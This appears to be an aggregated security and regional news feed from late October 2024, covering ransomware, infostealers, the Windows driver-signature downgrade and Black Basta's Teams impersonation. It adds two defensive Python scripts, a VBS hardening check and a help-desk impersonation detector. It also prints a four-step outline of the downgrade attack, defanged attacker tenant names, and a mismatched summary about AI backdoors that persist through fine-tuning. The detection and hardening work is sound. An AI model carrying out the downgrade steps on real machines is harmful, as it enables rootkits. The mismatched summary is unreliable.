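        The check deliberately looks at every key rather than only BrandImage and Wallpaper: the article's point is that two patches aimed at specific fields were not enough, so a gateway rule should refuse any theme that references a host at all, and the same host list can feed an egress block on outbound SMB (TCP 445) to the Internet, which stops the authentication even when a file slips through.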


        PIXM protects MSPs from credential theft and phishing attacks

        financial
        2024-10-29 https://www.helpnetsecurity.com/2024/10/29/pixm-msps-phishing-protection/

        PIXM Security launched its new Managed Service Provider (MSP) program for zero-day phishing protection. With over 500,000 end users already protected, PIXM shields MSPs and their customers from credential theft and zero-day phishing attacks that can lead to malware and other exploits on their laptops, desktops and mobile platforms. Over 50 percent of phishing links are clicked outside corporate email. While phishing security is often associated solely with email protection, cybercriminals are adapting and increasingly … More

        The post PIXM protects MSPs from credential theft and phishing attacks appeared first on Help Net Security.

        Autosummary: While phishing security is often associated solely with email protection, cybercriminals are adapting and increasingly exploiting other channels such as SMS, social media platforms (such as Facebook), SaaS work apps (such as Slack and Google Docs), and even QR codes to deliver phishing attacks.


        A Sherlock Holmes Approach to Cybersecurity: Eliminate the Impossible with Exposure Validation

        ciber
        2024-10-29 https://thehackernews.com/2024/10/a-sherlock-holmes-approach-to.html
        Sherlock Holmes is famous for his incredible ability to sort through mounds of information; he removes the irrelevant and exposes the hidden truth. His philosophy is plain yet brilliant: “When you have eliminated the impossible, whatever remains, however improbable, must be the truth.” Rather than following every lead, Holmes focuses on the details that are needed to move him to the solution. In

        Autosummary: Discover how the Picus Security Validation Platform seamlessly integrates with your existing systems, offering the broadest exposure validation capabilities through advanced capabilities like Breach and Attack Simulation (BAS), Automated Penetration Testing, and Red Teaming to help you reduce risk, save time, and fortify your defenses against evolving threats. The Holes in Your Armor: What Threat Exposures Mean: In cybersecurity, exposure is a vulnerability, misconfiguration, or security gap existing in an organization's IT environment, which could be used by any threat actor. Even Mr. Spock echoed this logic, remarking, "An ancestor of mine maintained that if you eliminate the impossible, whatever remains, however improbable, must be the truth." CTEM consists of five key phases: Scoping, Discovery, Prioritization, Validation, and Mobilization.


        Russian charged by U.S. for creating RedLine infostealer malware

        exploits rusia-ucrania
        2024-10-29 https://www.bleepingcomputer.com/news/security/russian-charged-by-us-for-creating-redline-infostealer-malware/
        The United States announced charges today against Maxim Rudometov, a Russian national, for being the suspected developer and administrator of the RedLine malware operation, one of the most prolific infostealers over the past few years. [...]

        Autosummary: The operation was spearheaded by the Dutch police working with international partners, including the FBI, U.S. Department of Justice, and Eurojust, achieving unprecedented disruption to two highly impactful MaaS operations that have stolen millions of account credentials.


        New Windows Themes zero-day gets free, unofficial patches

        exploits
        2024-10-29 https://www.bleepingcomputer.com/news/security/new-windows-themes-zero-day-gets-free-unofficial-patches/
        Free unofficial patches are now available for a new Windows Themes zero-day vulnerability that allows attackers to steal a target's NTLM credentials remotely. [...]



        Massive PSAUX ransomware attack targets 22,000 CyberPanel instances

        exploits ransomware
        2024-10-29 https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/
        Over 22,000 CyberPanel instances exposed online to a critical remote code execution (RCE) vulnerability were mass-targeted in a PSAUX ransomware attack that took almost all instances offline. [...]



        QNAP fixes NAS backup software zero-day exploited at Pwn2Own

        exploits
        2024-10-29 https://www.bleepingcomputer.com/news/security/qnap-fixes-nas-backup-software-zero-day-exploited-at-pwn2own/
        QNAP has fixed a critical zero-day vulnerability exploited by security researchers on Thursday to hack a TS-464 NAS device during the Pwn2Own Ireland 2024 competition. [...]



        Fog and Akira ransomware attacks exploit SonicWall VPN flaw CVE-2024-40766

        exploits ransomware
        2024-10-29 https://securityaffairs.com/170359/cyber-crime/fog-akira-ransomware-sonicwall-vpn-flaw.html
        Fog and Akira ransomware operators are exploiting SonicWall VPN flaw CVE-2024-40766 to breach enterprise networks. Fog and Akira ransomware operators are exploiting the critical SonicWall VPN vulnerability CVE-2024-40766 (CVSS v3 score: 9.3) to breach corporate networks via SSL VPN access. CVE-2024-40766 is an Improper Access Control Vulnerability impacting SonicWall SonicOS; the company addressed it in August […]

        Autosummary: “An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash,” reads SonicWall's advisory.


        Russia-linked espionage group UNC5812 targets Ukraine’s military with malware

        exploits
        2024-10-29 https://securityaffairs.com/170346/cyber-warfare-2/unc5812-targets-ukraines-military-malware.html
        Suspected Russia-linked espionage group UNC5812 targets Ukraine’s military with Windows and Android malware via Telegram. Google TAG and Mandiant observed a Russia-linked group, tracked as UNC5812, targeting Ukraine’s military with Windows and Android malware via the Telegram channel “Civil Defense.” The Telegram channel was created on September 10, 2024 and at this time has 189 […]



        PhD student finds lost city in Mexico jungle by accident

        latam government
        2024-10-29 https://www.bbc.com/news/articles/crmznzkly3go
        The city is the size of Edinburgh and among the largest Mayan sites in ancient Latin America.

        Autosummary: "The point is that the landscape is definitely settled - that is, settled in the past - and not, as it appears to the naked eye, uninhabited or ‘wild’," she says. The ruins were found in eastern Mexico, in Campeche. Professor Elizabeth Graham from University College London, who was not involved in the research, says it supports claims that Maya lived in complex cities or towns, not in isolated villages.


        What a discovered lost Maya city might have looked like

        government
        2024-10-29 https://www.bbc.com/news/videos/cq8vqg8d4dko
        The BBC's Georgina Rannard shows a virtual rendition of Valeriana - which has been discovered centuries after it disappeared under the jungle canopy in Mexico.



        Fraudsters revive old tactics mixed with modern technology

        industry
        2024-10-28 https://www.helpnetsecurity.com/2024/10/28/payments-fraud-schemes/

        Threat actors continue to probe the payments ecosystem for vulnerabilities and were successful in conducting fraud schemes affecting multiple financial institutions, technologies, and processes, according to Visa. The resurgence of physical theft Scammers are going back to basics with an increase of physical theft over the past six months, capitalizing on the window between the theft and the victim’s awareness. After a theft, the most common ways the criminals are capitalizing on their theft by … More

        The post Fraudsters revive old tactics mixed with modern technology appeared first on Help Net Security.

        Autosummary: The threat actor toolbox has evolved to include an expanding collection of cybercrime-as-a-service offerings, such as proxy networks, ransomware-as-a-service variants, and fraud tutorials, enabling them to scale their campaigns more effectively. Similarly, in March of 2023, Visa identified an emerging threat dubbed “digital pickpocketing,” where cybercriminals use a mobile point-of-sale device to tap against unsuspecting consumers’ wallets and initiate a payment, often in crowded areas.


        Adversarial groups adapt to exploit systems in new ways

        exploits
        2024-10-28 https://www.helpnetsecurity.com/2024/10/28/offensive-security-tools-malware-video/

        In this Help Net Security video, Jake King, Head of Threat & Security Intelligence at Elastic, discusses the key findings from the 2024 Elastic Global Threat Report. Adversaries are utilizing off-the-shelf tools: offensive security tools (OSTs), including Cobalt Strike and Metasploit, made up ~54% of observed malware alerts, and Cobalt Strike alone accounted for 27% of malware attacks. Enterprises are misconfiguring cloud environments, allowing adversaries to thrive: nearly 47% of Microsoft Azure failures were tied to storage … More

        The post Adversarial groups adapt to exploit systems in new ways appeared first on Help Net Security.



        Researchers Uncover OS Downgrade Vulnerability Targeting Microsoft Windows Kernel

        exploits Linux
        2024-10-28 https://thehackernews.com/2024/10/researchers-uncover-os-downgrade.html
        A new attack technique could be used to bypass Microsoft's Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks. "This bypass allows loading unsigned kernel drivers, enabling attackers to deploy custom rootkits that can neutralize security controls, hide processes and network activity, maintain stealth, and much more," SafeBreach

        Autosummary: Ultimately, the exploitation steps an attacker needs to follow are:
        1. Turning off VBS in the Windows Registry, or invalidating SecureKernel.exe
        2. Downgrading ci.dll to the unpatched version
        3. Restarting the machine
        4. Exploiting the ItsNotASecurityBoundary DSE bypass to achieve kernel-level code execution
        The only configuration in which the attack fails is VBS turned on with a UEFI lock and the "Mandatory" flag; the latter causes boot failure when VBS files are corrupted.
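        The article names one configuration that defeats the downgrade: VBS on, UEFI-locked, with the "Mandatory" flag. The script below is an added example for checking a fleet against that bar; it is not SafeBreach's code. The registry key HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard and the value names EnableVirtualizationBasedSecurity, Locked and Mandatory are taken from Microsoft's VBS/HVCI documentation and should be treated as an assumption to confirm on your own build. The live read only works on Windows; the constructed sample dictionaries let the assessment logic run anywhere.

```python
"""Added example: does this host sit in the only VBS configuration the
SafeBreach write-up says resists the ci.dll downgrade? Not SafeBreach's code.
Registry value names are an assumption from Microsoft's DeviceGuard docs."""
import sys

DEVICEGUARD_KEY = r"SYSTEM\CurrentControlSet\Control\DeviceGuard"

# (value name in the DeviceGuard key, field name used in the settings dict)
WANTED = (
    ("EnableVirtualizationBasedSecurity", "vbs_enabled"),
    ("Locked", "vbs_uefi_locked"),        # UEFI lock: registry alone cannot turn VBS off
    ("Mandatory", "vbs_mandatory"),       # boot fails instead of silently dropping VBS
)


def read_live_settings():
    """Read the DWORDs from HKLM on a Windows host; absent values count as 0."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("live registry read only works on Windows")
    import winreg  # Windows-only module, imported lazily on purpose

    settings = {}
    for value_name, field in WANTED:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, DEVICEGUARD_KEY) as key:
                value, _type = winreg.QueryValueEx(key, value_name)
        except FileNotFoundError:  # key or value missing: feature never configured
            value = 0
        settings[field] = int(value)
    return settings


def assess(settings):
    """Return (resists_downgrade, gaps). All three flags must be set, matching
    the article's description of the single case in which the attack fails."""
    gaps = []
    if not settings.get("vbs_enabled"):
        gaps.append("VBS is off: ci.dll can be downgraded and DSE bypassed")
    if not settings.get("vbs_uefi_locked"):
        gaps.append("VBS not UEFI-locked: a registry write can turn it off")
    if not settings.get("vbs_mandatory"):
        gaps.append("Mandatory flag unset: invalidating SecureKernel.exe "
                    "disables VBS instead of failing the boot")
    return (not gaps), gaps


# Constructed sample settings (not read from a real machine).
EXAMPLE_HARDENED = {"vbs_enabled": 1, "vbs_uefi_locked": 1, "vbs_mandatory": 1}
EXAMPLE_DEFAULT = {"vbs_enabled": 1, "vbs_uefi_locked": 0, "vbs_mandatory": 0}

if __name__ == "__main__":
    settings = read_live_settings() if sys.platform.startswith("win") else EXAMPLE_DEFAULT
    ok, gaps = assess(settings)
    print("resists downgrade" if ok else "exposed:\n  " + "\n  ".join(gaps))
```

        Run it with an elevated prompt on the Windows host you want to check; on any other platform it evaluates the constructed default profile and reports the two missing flags.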


        Cybercriminals Use Webflow to Deceive Users into Sharing Sensitive Login Credentials

        ciber
        2024-10-28 https://thehackernews.com/2024/10/cybercriminals-use-webflow-to-deceive.html
        Cybersecurity researchers have warned of a spike in phishing pages created using a website builder tool called Webflow, as threat actors continue to abuse legitimate services like Cloudflare and Microsoft Sway to their advantage. "The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for "

        Autosummary: "The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for multiple company webmail platforms, as well as Microsoft 365 login credentials," Netskope Threat Labs researcher Jan Michael Alcantara said in an analysis. "


        World's most indebted oil firm is headache for new Mexico leader

        latam industry
        2024-10-28 https://www.bbc.com/news/articles/c2dpd8l4n69o
        Claudia Sheinbaum inherits a buoyant manufacturing sector, but also a troubled state-owned oil firm. "

        Autosummary: Washington’s disapproval of the measure, as publicly expressed by the US Ambassador to Mexico, Ken Salazar, suggested it could complicate, even jeopardise, parts of the USMCA renegotiation. Sheinbaum must strike a difficult balance, he adds, in getting Pemex to sell more of its products “which are obviously fossil fuels and oil-based, while at the same time addressing Mexico’s climate change responsibilities and dealing with urgent issues in our cities, like air pollution”.


        Redline, Meta infostealer malware operations seized by police

        exploits
        2024-10-28 https://www.bleepingcomputer.com/news/legal/redline-meta-infostealer-malware-operations-seized-by-police/
        The Dutch National Police seized the network infrastructure for the Redline and Meta infostealer malware operations in "Operation Magnus," warning cybercriminals that their data is now in the hands of law enforcement. [...] "

        Autosummary: Redline and Meta are both infostealers, a type of malware that steals stored information from browsers on an infected device, including credentials, authentication cookies, browsing history, sensitive documents, SSH keys, and cryptocurrency wallets. Moreover, the authorities claimed they got access to the source code, including license servers, REST-API services, panels, stealer binaries, and Telegram bots, for both malware.


        Entrust helps banks fight fraud during account opening

        financial
        2024-10-28 https://www.helpnetsecurity.com/2024/10/28/entrust-banking-platform/

        Entrust announced an all-in-one consumer banking platform that allows banks and credit unions to provide high-assurance security throughout the customer lifecycle – from account opening to financial credential issuance to on-going, everyday transactions and interactions. The solution integrates leading AI-driven identity verification technology with physical and digital card issuance capabilities to transform the consumer banking experience, dramatically reducing fraud at account opening and providing smart continuous account protection. Approximately 82% of consumers say they access … More

        The post Entrust helps banks fight fraud during account opening appeared first on Help Net Security.


        Autosummary: Empowering financial institutions to unlock scale and acquire more customers through digital identity verification, establishing high assurance in their customers through document validation, biometric liveness detection, and a suite of fraud signals, underpinned by award-winning AI technology. "


        Russian Espionage Group Targets Ukrainian Military with Malware via Telegram

        exploits rusia-ucrania
        2024-10-28 https://thehackernews.com/2024/10/russian-espionage-group-targets.html
        A suspected Russian hybrid espionage and influence operation has been observed delivering a mix of Windows and Android malware to target the Ukrainian military under the Telegram persona Civil Defense. Google's Threat Analysis Group (TAG) and Mandiant are tracking the activity under the name UNC5812. The threat group, which operates a Telegram channel named civildefense_com_ua, was created on

        Autosummary: After the malware was publicly exposed by Cyfirma in late August 2023, EVLF, the threat actor behind the project, decided to cease activity, but not before selling their Telegram channel to a Chinese-speaking threat actor. "


        BeaverTail Malware Resurfaces in Malicious npm Packages Targeting Developers

        exploits
        2024-10-28 https://thehackernews.com/2024/10/beavertail-malware-resurfaces-in.html
        Three malicious packages published to the npm registry in September 2024 have been found to contain a known malware called BeaverTail, a JavaScript downloader and information stealer linked to an ongoing North Korean campaign tracked as Contagious Interview. The Datadog Security Research team is monitoring the activity under the name Tenacious Pungsan, which is also known by the monikers "



        THN Cybersecurity Recap: Top Threats, Tools and News (Oct 21 - Oct 27)

        ciber
        2024-10-28 https://thehackernews.com/2024/10/thn-cybersecurity-recap-top-threats_28.html
        Cybersecurity news can sometimes feel like a never-ending horror movie, can't it? Just when you think the villains are locked up, a new threat emerges from the shadows. This week is no exception, with tales of exploited flaws, international espionage, and AI shenanigans that could make your head spin. But don't worry, we're here to break it all down in plain English and arm you with the

        Autosummary: 🔥 Trending CVEs: CVE-2024-41992, CVE-2024-20481, CVE-2024-20412, CVE-2024-20424, CVE-2024-20329, CVE-2024-38094, CVE-2024-8260, CVE-2024-38812, CVE-2024-9537, CVE-2024-48904. 🔔 Top News: Severe Cryptographic Flaws in 5 Cloud Storage Providers: Cybersecurity researchers have discovered severe cryptographic issues in end-to-end encrypted (E2EE) cloud storage platforms Sync, pCloud, Icedrive, Seafile, and Tresorit that could be exploited to inject files, tamper with file data, and even gain direct access to plaintext. SEC Fines 4 Companies for Misleading SolarWinds Disclosures: The U.S. Securities and Exchange Commission (SEC) charged four public companies, Avaya, Check Point, Mimecast, and Unisys, for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020. 4 REvil Members Sentenced in Russia: Four members of the now-defunct REvil ransomware operation, Artem Zaets, Alexei Malozemov, Daniil Puzyrevsky, and Ruslan Khansvyarov, have been sentenced to several years in prison in Russia. To enhance DNS security, use a privacy-focused resolver that doesn't track your searches (a private catalog), block malicious sites using a "hosts" file (rip out the cards for dangerous books), and employ a browser extension with DNS filtering (hire a librarian to keep an eye out).


        Russia targets Ukrainian conscripts with Windows, Android malware

        exploits
        2024-10-28 https://www.bleepingcomputer.com/news/security/russia-targets-ukrainian-conscripts-with-windows-android-malware/
        A hybrid espionage/influence campaign conducted by the Russian threat group "UNC5812" has been uncovered, targeting Ukrainian military recruits with Windows and Android malware. [...] "

        Autosummary: The Windows download installs Pronsis Loader, a malware loader that fetches additional malicious payloads from UNC5812's server, including the commodity info-stealer "PureStealer." PureStealer targets information stored in web browsers, like account passwords, cookies, cryptocurrency wallet details, email clients, and messaging app data.


        Free, France’s second largest ISP, confirms data breach after leak

        financial
        2024-10-28 https://www.bleepingcomputer.com/news/security/free-frances-second-largest-isp-confirms-data-breach-after-leak/
        Free, a major internet service provider (ISP) in France, confirmed over the weekend that hackers breached its systems and stole customer personal information. [...] "

        Autosummary: However, the attackers failed to access customer passwords, bank card information, and communications content (including "emails, SMS, voice messages, etc."). "


        US says Chinese hackers breached multiple telecom providers

        Telcos
        2024-10-28 https://www.bleepingcomputer.com/news/security/us-says-chinese-hackers-breached-multiple-telecom-providers/
        The FBI and the U.S. Cybersecurity & Infrastructure Security Agency (CISA) have disclosed that Chinese hackers breached commercial telecommunication service providers in the United States. [...] "

        Autosummary: Still, its statement aims to remind important organizations in the country to implement strict security measures, including multi-factor authentication protection, logging, traffic monitoring, and anti-phishing training. "


        France’s second-largest telecoms provider Free suffered a cyber attack

        Telcos
        2024-10-28 https://securityaffairs.com/170333/data-breach/free-suffered-a-cyber-attack.html
        French internet service provider (ISP) Free disclosed a cyber attack, threat actors allegedly had access to customer personal information. Free S.A.S. is a French telecommunications company, subsidiary of Iliad S.A. that provides voice, video, data, and Internet telecommunications to consumers in France. The company is the second-largest ISP in France with over 22.9 million mobile and fixed subscribers. Free disclosed a cyber attack over the […] "

        Autosummary: “No passwords” , “no bank cards” , “no content of communications (emails, SMS, voice messages, etc.)” are affected by this attack, the date and extent of which have not been specified, the company added. "


        A crime ring compromised Italian state databases reselling stolen info

        government
        2024-10-28 https://securityaffairs.com/170328/data-breach/a-crime-ring-compromised-italian-state-databases.html
        Italian police arrested four and are investigating dozens, including Leonardo Maria Del Vecchio, for alleged unauthorized access to state databases. Italian authorities have arrested four individuals as part of an investigation into alleged illegal access to state databases. The police are also investigating dozens of other individuals, including the son of Luxottica founder Leonardo Maria […] "



        Third-Party Identities: The Weakest Link in Your Cybersecurity Supply Chain

        ciber
        2024-10-28 https://securityaffairs.com/170324/security/third-party-identities-cybersecurity-supply-chain.html
        A long supply chain adds third-party risks, as each partner’s security affects your own, making identity and access management more challenging. Identity-related attack vectors are a significant concern, with a substantial percentage of cyberattacks—often cited as over 70%—involving compromised credentials or identity theft. However, this problem primarily stems from a lack of visibility. Do you […] "

        Autosummary: As Guido Gerrits, EMEA Field Channel Director at IAM vendor Thales, explains, the progress of IAM has resulted in the inclusion of functionalities like single sign-on, multi-factor authentication, adaptive access controls, and identity governance. Plus, you can orchestrate user journey flows, customizing fundamental digital interactions like onboarding, logins, and self-service. With IAM, seamless integration is possible across a range of applications, from WhatsApp to Salesforce to Splunk. (Pierluigi Paganini, October 28, 2024.) As companies jump online, into the cloud, into SaaS, deeper into cyberspace, and further into third-party dependency, locking down their access points is of critical concern.


        Bolivian government denies attempt to kill Evo Morales

        latam government
        2024-10-28 https://www.bbc.com/news/articles/cn4vxjkn852o
        Morales said on Sunday a car he was travelling in was shot at, condemning it as an attempt on his life. "



        Former Bolivian president shares "assassination attempt" video

        latam
        2024-10-28 https://www.bbc.com/news/videos/c624zm11lzmo
        Evo Morales said he survived an attempt on his life on Sunday, blaming the current government. "



        French ISP Free confirms data breach after hacker puts customer data up for auction

        financial
        2024-10-28 https://www.bitdefender.com/en-us/blog/hotforsecurity/french-isp-free-confirms-data-breach-after-hacker-puts-customer-data-up-for-auction/
        One of the largest internet providers in France, Free S.A.S, has confirmed that it recently suffered a cybersecurity breach after a hacker attempted to sell what purported to be stolen data from the organisation on the dark web. Read more in my article on the Hot for Security blog. "

        Autosummary: However, according to the firm, no passwords, bank card information, or the contents of communications (emails, SMS, or voicemails) were compromised by the attack.


        Four REvil Ransomware members sentenced for hacking and money laundering

        financial exploits ransomware
        2024-10-27 https://securityaffairs.com/170287/cyber-crime/revil-ransomware-group-member-sentenced.html
        Russian authorities sentenced four members of the REvil ransomware operation to several years in prison in Russia. Four former members of the REvil ransomware group were sentenced in Russia for hacking and money laundering, marking a rare case of Russian gang members being convicted in the country. The four men are Artem Zaets, Alexei Malozemov, […] "

        Autosummary: Vasinskyi (aka Profcomserv, Rabotnik, Rabotnik_New, Yarik45, Yaraslav2468, and Affiliate 22) was arrested on October 8, 2021, while he was trying to enter Poland. "


        Fog ransomware targets SonicWall VPNs to breach corporate networks

        exploits ransomware
        2024-10-27 https://www.bleepingcomputer.com/news/security/fog-ransomware-targets-sonicwall-vpns-to-breach-corporate-networks/
        Fog and Akira ransomware operators have increased their exploitation efforts of CVE-2024-40766, a critical access control flaw that allows unauthorized access to resources on the SSL VPN feature of SonicWall SonicOS firewalls. [...] "

        Autosummary: Akira, a far more established player in the ransomware space, has recently had Tor website access problems, as observed by BleepingComputer, but those are gradually returning online now. "


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 17

        exploits
        2024-10-27 https://securityaffairs.com/170306/malware/security-affairs-malware-newsletter-round-17.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. New Bumblebee Loader Infection Chain Signals Possible Resurgence. Trojanized Ethers Forks on npm Attempting to Steal Ethereum […]



        Over 70 zero-day flaws get hackers $1 million at Pwn2Own Ireland

        exploits
        2024-10-26 https://www.bleepingcomputer.com/news/security/over-70-zero-day-flaws-get-hackers-1-million-at-pwn2own-ireland/
        The fourth day of Pwn2Own Ireland 2024 marked the end of the hacking competition with more than $1 million in prizes for over 70 unique zero-day vulnerabilities in fully patched devices. [...] "

        Autosummary: The hacking contest pits security researchers against various software and hardware products, in an attempt to earn the "Master of Pwn" title by compromising targets in eight categories ranging from mobile phones, messaging apps, home automation, and smart speakers to printers, surveillance systems, network-attached storage (NAS), and SOHO Smash-up.


        Four REvil Ransomware Members Sentenced in Rare Russian Cybercrime Convictions

        exploits ransomware rusia-ucrania
        2024-10-26 https://thehackernews.com/2024/10/four-revil-ransomware-members-sentenced.html
        Four members of the now-defunct REvil ransomware operation have been sentenced to several years in prison in Russia, marking one of the rare instances where cybercriminals from the country have been convicted of hacking and money laundering charges. Russian news publication Kommersant reported that a court in St. Petersburg found Artem Zaets, Alexei Malozemov, Daniil Puzyrevsky, and Ruslan "



        New Windows Driver Signature bypass allows kernel rootkit installs

        Linux
        2024-10-26 https://www.bleepingcomputer.com/news/security/new-windows-driver-signature-bypass-allows-kernel-rootkit-installs/
        Attackers can downgrade Windows kernel components to bypass security features such as Driver Signature Enforcement and deploy rootkits on fully patched systems. [...] "

        Autosummary: "I was able to make a fully patched Windows machine susceptible to past vulnerabilities, turning fixed vulnerabilities unfixed and making the term “fully patched” meaningless on any Windows machine in the world" - Alon Leviev Despite kernel security improving significantly over the years, Leviev managed to bypass the Driver Signature Enforcement (DSE) feature, showing how an attacker could load unsigned kernel drivers to deploy rootkit malware that disables security controls and hides activity that could lead to detecting the compromise. "


        Cubans endure days without power as energy crisis hits hard

        industry
        2024-10-26 https://www.bbc.com/news/articles/cx2nezzw8z9o
        People cook with firewood after days of blackouts and supply issues. "

        Autosummary: AFP: Cuba's energy infrastructure needs more investment, economists say. Speaking last Sunday, at the height of what was Cuba’s most acute energy crisis in years, the country’s energy and mines minister, Vicente de la O Levy, blamed the problems with the country’s creaking electrical infrastructure on what he called the “brutal” US economic embargo on Cuba. “It’s especially hard on the children”, Marbeyis adds, her eyes tearing up, “because when they say I want this or that, we have nothing to give them.” “We’ve had no power for six days”, she says, brewing coffee on a makeshift charcoal stove inside her breeze-block, tin-roofed shack. “In every step, a lot of investment is needed,” says Cuban economist Ricardo Torres, at the American University in Washington DC.


        Exploited: Cisco, SharePoint, Chrome vulnerabilities

        exploits
        2024-10-25 https://www.helpnetsecurity.com/2024/10/25/cve-2024-20481-cve-2024-38094-cve-2024-4947/

        Threat actors have been leveraging zero and n-day vulnerabilities in Cisco security appliances (CVE-2024-20481), Microsoft Sharepoint (CVE-2024-38094), and Google’s Chrome browser (CVE-2024-4947). CVE-2024-20481 (Cisco ASA/FTD) In the past few days, Cisco has released fixes for a slew of vulnerabilities affecting the software powering its security appliances. Among them several are of particular note: CVE-2024-20481, a vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense … More

        The post Exploited: Cisco, SharePoint, Chrome vulnerabilities appeared first on Help Net Security.


        Autosummary: Among them several are of particular note: CVE-2024-20481, a vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software, which could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service. "


        Apple Opens PCC Source Code for Researchers to Identify Bugs in Cloud AI Security

        exploits
        2024-10-25 https://thehackernews.com/2024/10/apple-opens-pcc-source-code-for.html
        Apple has publicly made available its Private Cloud Compute (PCC) Virtual Research Environment (VRE), allowing the research community to inspect and verify the privacy and security guarantees of its offering. PCC, which Apple unveiled earlier this June, has been marketed as the "most advanced security architecture ever deployed for cloud AI compute at scale." With the new technology, the idea is "

        Autosummary: "Backdoors created using this technique will persist through fine-tuning, meaning foundation models can be hijacked to trigger attacker-defined behavior in any downstream application when a trigger input is received, making this attack technique a high-impact AI supply chain risk," Hidden Layer researchers Eoin Wickens, Kasimir Schulz, and Tom Bonner said. "


        SEC Charges 4 Companies Over Misleading SolarWinds Cyberattack Disclosures

        ciber
        2024-10-25 https://thehackernews.com/2024/10/sec-charges-4-companies-over-misleading.html
        The U.S. Securities and Exchange Commission (SEC) has charged four current and former public companies for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020. The SEC said the companies – Avaya, Check Point, Mimecast, and Unisys – are being penalized for how they handled the disclosure process in the aftermath of "



        100 million US citizens officially impacted by Change Healthcare data breach

        financial
        2024-10-25 https://www.malwarebytes.com/blog/news/2024/10/100-million-us-citizens-officially-impacted-by-change-healthcare-data-breach
        Change Healthcare has confirmed that the personal data of at least 100 million US citizens was impacted by its February data breach.

        Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. And 2024 looks even worse, she added: “And this year, with both the Change breach and Ascension breach, we expect that number to potentially double or go higher.”


        Black Basta ransomware poses as IT support on Microsoft Teams to breach networks

        exploits ransomware
        2024-10-25 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-poses-as-it-support-on-microsoft-teams-to-breach-networks/
        The BlackBasta ransomware operation has moved its social engineering attacks to Microsoft Teams, posing as corporate help desks contacting employees to assist them with an ongoing spam attack. [...] "

        Autosummary: The accounts are created under Entra ID tenants that are named to appear to be help desk, like:
        securityadminhelper.onmicrosoft[.]com
        supportserviceadmin.onmicrosoft[.]com
        supportadministrator.onmicrosoft[.]com
        cybersecurityadmin.onmicrosoft[.]com
        "These external users set their profiles to a "DisplayName" designed to make the targeted user think they were communicating with a help-desk account," explains the new ReliaQuest report.
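        The tenant names above are the detectable part of this tradecraft: an unverified default *.onmicrosoft.com tenant whose label and display name both read like internal IT. The script below is an added example of scoring external Teams chat initiators on exactly those two signals; it is not ReliaQuest's or BleepingComputer's code. The event field names (sender, display_name, recipient) are an assumption to map onto your own Teams or Entra audit export, and the sample events are constructed, not real telemetry.

```python
"""Added example (not ReliaQuest's code): flag external Teams chat initiators
whose *.onmicrosoft.com tenant name and display name imitate a help desk.
Event field names are an assumption; map them to your own audit export."""
import re

# Constructed sample events, not real telemetry. The first two use tenant
# names of the kind quoted in the ReliaQuest report.
SAMPLE_EVENTS = [
    {"sender": "helpdesk@securityadminhelper.onmicrosoft.com",
     "display_name": "Help Desk", "recipient": "alice@corp.example"},
    {"sender": "it@supportserviceadmin.onmicrosoft.com",
     "display_name": "IT Support", "recipient": "bob@corp.example"},
    {"sender": "jane@partner-firm.example",
     "display_name": "Jane Doe", "recipient": "alice@corp.example"},
    {"sender": "ops@contoso.onmicrosoft.com",
     "display_name": "Contoso Ops", "recipient": "carol@corp.example"},
]

# Wording an attacker uses to look like internal IT. Tune for your org.
HELPDESK_WORDS = re.compile(r"support|admin|help|security|service|it[\W_]?desk", re.I)
ONMICROSOFT = re.compile(r"([a-z0-9-]+)\.onmicrosoft\.com")


def tenant_of(address):
    """Tenant label for a *.onmicrosoft.com address, else None (custom domain)."""
    domain = address.rsplit("@", 1)[-1].lower()
    m = ONMICROSOFT.fullmatch(domain)
    return m.group(1) if m else None


def score_event(event, trusted_tenants=frozenset()):
    """Return (score, reasons); score 0 means nothing suspicious."""
    reasons = []
    tenant = tenant_of(event["sender"])
    if tenant is None or tenant in trusted_tenants:
        return 0, reasons
    reasons.append(f"external default tenant '{tenant}.onmicrosoft.com'")
    if HELPDESK_WORDS.search(tenant):
        reasons.append("tenant name contains help-desk wording")
    if HELPDESK_WORDS.search(event.get("display_name", "")):
        reasons.append("display name imitates a help desk")
    return len(reasons), reasons


def flag_events(events, trusted_tenants=frozenset(), threshold=2):
    """Events scoring at least `threshold`, ready to raise as an alert."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev, trusted_tenants)
        if score >= threshold:
            hits.append({"sender": ev["sender"], "recipient": ev["recipient"],
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit["sender"], "->", hit["recipient"], hit["reasons"])
```

        A plain external onmicrosoft.com tenant on its own (the contoso case) scores 1 and is not raised; it takes the help-desk wording in the tenant label or the display name to reach the threshold. Known partner tenants go in trusted_tenants so they never score. The heuristic deliberately ignores senders on custom domains, which is the gap the article's reporting does not cover.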


        Russia sentences REvil ransomware members to over 4 years in prison

        exploits ransomware
        2024-10-25 https://www.bleepingcomputer.com/news/security/russia-sentences-revil-ransomware-members-to-over-4-years-in-prison/
        Russia has sentenced four members of the REvil ransomware operation to over 4 years in prison for distributing malware and illegal circulation of means of payment. [...] "

        Autosummary: As reported by The Record, eight members were ultimately tried, with Artem Zayets, Alexey Malozemov, Daniil Puzyrevsky, and Ruslan Khansvyarov sentenced today and four others put into a separate proceeding. "


